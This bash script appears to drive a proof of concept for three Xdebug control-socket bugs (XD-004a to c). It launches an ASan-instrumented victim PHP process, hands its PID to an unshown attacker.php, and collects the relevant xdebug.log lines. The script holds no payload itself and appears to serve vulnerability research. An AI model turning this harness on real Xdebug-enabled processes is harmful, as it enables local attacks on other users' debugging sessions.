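#!/usr/bin/env bash
# XD-004 PoC orchestrator. Runs all three sub-bugs against a fresh victim.
#
# Usage: pass one of a, b, c or all as the only argument (default: all).
#
# Each case starts its own victim PHP process with the Xdebug control socket
# enabled, hands the PID printed by the victim to attacker.php, and then prints
# the tagged xdebug.log lines plus the tail of the victim's output.
# The victim process and both temp files are cleaned up on normal return, on
# start-up failure and on INT/TERM, so a process with the control socket
# enabled is not left running after the script ends.
#
# Edit these paths or pass via env:
PHP=${PHP:-/home/ilia/php-src-8.4/sapi/cli/php}
XDEBUG_SO=${XDEBUG_SO:-/home/ilia/xdebug/modules/xdebug.so}
ATTACKER_PHP=${ATTACKER_PHP:-php}
MODE=${1:-all}

set -u

HERE=$(dirname -- "$0")

# Print a diagnostic on stderr and exit with the given status.
#   $1 - message, $2 - exit status
die() {
  printf '%s\n' "$1" >&2
  exit "$2"
}

# Preflight: fail early (status 2) when a required binary or script is missing.
[ -x "$PHP" ] || die "PHP=$PHP not executable" 2
[ -f "$XDEBUG_SO" ] || die "XDEBUG_SO=$XDEBUG_SO not found" 2
command -v "$ATTACKER_PHP" >/dev/null \
  || die "ATTACKER_PHP=$ATTACKER_PHP not found in PATH" 2
[ -f "$HERE/victim.php" ] || die "$HERE/victim.php not found" 2
[ -f "$HERE/attacker.php" ] || die "$HERE/attacker.php not found" 2

# State of the case currently in flight. Kept global so the EXIT trap can
# still reach it when the script is interrupted in the middle of a case.
ACTIVE_VICTIM=
ACTIVE_OUT=
ACTIVE_LOG=

# Stop the in-flight victim (if any) and delete the per-case temp files.
# Safe to call repeatedly; always returns 0.
cleanup_case() {
  if [ -n "$ACTIVE_VICTIM" ]; then
    # TERM rather than INT: background jobs of a non-interactive shell are
    # started with SIGINT ignored, so Ctrl-C alone would not stop the victim.
    kill "$ACTIVE_VICTIM" 2>/dev/null || true
    wait "$ACTIVE_VICTIM" 2>/dev/null || true
    ACTIVE_VICTIM=
  fi
  [ -z "$ACTIVE_OUT" ] || rm -f -- "$ACTIVE_OUT"
  [ -z "$ACTIVE_LOG" ] || rm -f -- "$ACTIVE_LOG"
  ACTIVE_OUT=
  ACTIVE_LOG=
}
trap cleanup_case EXIT
# Turn INT/TERM into a regular exit so the EXIT trap above always runs.
trap 'exit 130' INT
trap 'exit 143' TERM

# Run one sub-case against a freshly started victim.
#   $1 - case letter passed through to attacker.php (a, b or c)
# Outputs: case banner, victim pid, tagged xdebug.log lines, victim output tail.
# Returns: 0 once the case has run; 3 if the victim could not be set up.
run_case() {
  local case_id=$1
  local pid=''
  local attempt

  ACTIVE_OUT=$(mktemp) || { echo "mktemp failed" >&2; cleanup_case; return 3; }
  ACTIVE_LOG=$(mktemp) || { echo "mktemp failed" >&2; cleanup_case; return 3; }

  echo "=== XD-004$case_id ==="

  # ASan: no leak check, keep going after a report instead of aborting, and
  # print stack traces. stdout and stderr of the victim share one capture file.
  ASAN_OPTIONS=detect_leaks=0:abort_on_error=0:halt_on_error=0:print_stacktrace=1 \
    "$PHP" \
    -d zend_extension="$XDEBUG_SO" \
    -d xdebug.mode=develop \
    -d xdebug.control_socket=default \
    -d xdebug.log="$ACTIVE_LOG" \
    -d xdebug.log_level=10 \
    "$HERE/victim.php" \
    >"$ACTIVE_OUT" 2>&1 &
  ACTIVE_VICTIM=$!

  # Wait at least one second (as before), then keep polling for a few more so
  # a slow instrumented start-up is not reported as a failure. Stop early if
  # the victim has already exited.
  for attempt in 1 2 3 4 5; do
    sleep 1
    pid=$(grep -oE 'pid=[0-9]+' "$ACTIVE_OUT" | head -1 | cut -d= -f2)
    [ -z "$pid" ] || break
    kill -0 "$ACTIVE_VICTIM" 2>/dev/null || break
  done

  if [ -z "$pid" ]; then
    echo "victim never printed its PID" >&2
    # Show what the victim did print before the capture file is deleted.
    tail -n 10 "$ACTIVE_OUT" >&2
    cleanup_case
    return 3
  fi

  echo "victim pid=$pid (uid=$(id -u))"
  "$ATTACKER_PHP" "$HERE/attacker.php" "$pid" "$case_id"

  # The victim is expected to finish on its own; its exit status is ignored.
  wait "$ACTIVE_VICTIM" 2>/dev/null
  # Already reaped: clear the PID so cleanup never signals a recycled PID.
  ACTIVE_VICTIM=

  echo "--- xdebug.log relevant lines ---"
  grep -E "CTRL-AUTH|CTRL-HANDLE" "$ACTIVE_LOG" 2>/dev/null || echo " (none)"
  echo "--- victim stderr tail ---"
  tail -n 10 "$ACTIVE_OUT"
  echo

  cleanup_case
}

# Dispatch. In "all" mode every case runs even if an earlier one failed to
# start; the script exits non-zero if any case reported a failure.
status=0
case "$MODE" in
  a|b|c)
    run_case "$MODE" || status=$?
    ;;
  all)
    for sub in a b c; do
      run_case "$sub" || status=$?
    done
    ;;
  *)
    echo "usage: $0 [a|b|c|all]" >&2
    exit 1
    ;;
esac
exit "$status"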